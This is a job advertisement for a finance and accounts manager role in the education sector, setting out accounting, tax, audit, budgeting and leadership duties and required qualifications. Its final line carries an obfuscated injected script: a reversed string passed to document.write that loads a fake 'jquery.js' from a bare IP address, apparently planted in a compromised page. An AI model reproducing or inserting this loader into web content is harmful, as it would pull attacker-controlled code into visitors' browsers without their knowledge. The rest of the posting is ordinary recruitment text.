Industry : Education
Leadership and oversight includes:
– Planning, co-ordination and management of the daily operational functions of these areas
– Continuous improvement in driving excellence in the systems, processes, internal controls and deliverables for these areas
– Develop a cohesive and strong team across these functions who are capable to lead and become trusted business partners and subject matter expert
Specifically, this includes:
– Compliance with accounting standards adopted by the company for all the transactions.
– Monitor and take action on project financial performance review, monitor budget and cost of projects and overheads.
– Responsible for overall accounting and financial recordings, financial reporting, development and implementation of internal control and procedure compliance.
– Take the lead for cost-control, financial analysis and fund management, including credit control.
– Supervise the preparation of the monthly accounts to facilitate internal and external reporting and in accordance with respective applicable legal compliance with local authorities.
– Oversee the appropriate compliance to procurement procedures and enable risk management and efficiency of procurement processes
– Monitor annual budgets and monthly forecasts vs. actual performance.
– Responsible for tax compliance and reporting, management of audits, budgeting, process and implementation, and financial system upgrade.
– Responsible for tax planning and administration in ensuring that an efficient and effective tax structure is in place.
– Manage the financial and statutory audits process.
– Take a lead role in developing and improving standard operation procedures in Finance department.
– Monitor Finance related section of the scorecard and produce variance analysis and recommend timely corrective actions.
– Monitor and address accuracy of financial reports and accounting data entries
– Control financial activities and ensure timely reporting, work includes audit and establish policies & procedures.
– Provide training and mentoring for the team and staff development.
– Ability to design reports in Microsoft excel for analysis and monitoring, design project budget templates and any other template to improve the efficiency and effectivess of reporting.
– Other tasks and responsibilities assigned from time to time.
Other Responsibilities and Duties
– Promote and adhere to the Company’s Vision and Values at all times.
– Maintain high commitment to quality, positive attitude, accountability and enthusiasm at all times.
– Observe culturally sensitive and appropriate behavior, dress codes and language at all times
– Minimum Degree in Accounting
– Professional qualification in Finance or equivalent (eg MIA, ACCA, CPA Australia, CPA Malaysia)
– More than 5 years working experience in Managing Finance & Accounts Department in various industries.
– Service industry experience is an added advantage.
– Minimum of 3 years audit working experience in Big 4 or Medium Firm.
– In depth knowledge of Accounting, Finance and Taxation.
– Competent in managing financial systems and excellent in fundamental ICT applications (eg. Microsoft Office)
– Competent in financial analysis and financial reporting.
– Excellent planning, analytical, interpersonal and communication skills.
– Good problems solving and decision making skills with strong interpersonal and communication skills in English.
– Excellent planning, attentive to details, organized and thorough with desire for continuous improvements.
– Good writing, presentation and preparation of Board papers.
– Advance Microsoft excel skills to design and develop templates / reports.
– Dedicated self-starter with ability to multi task and meet tight timelines. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))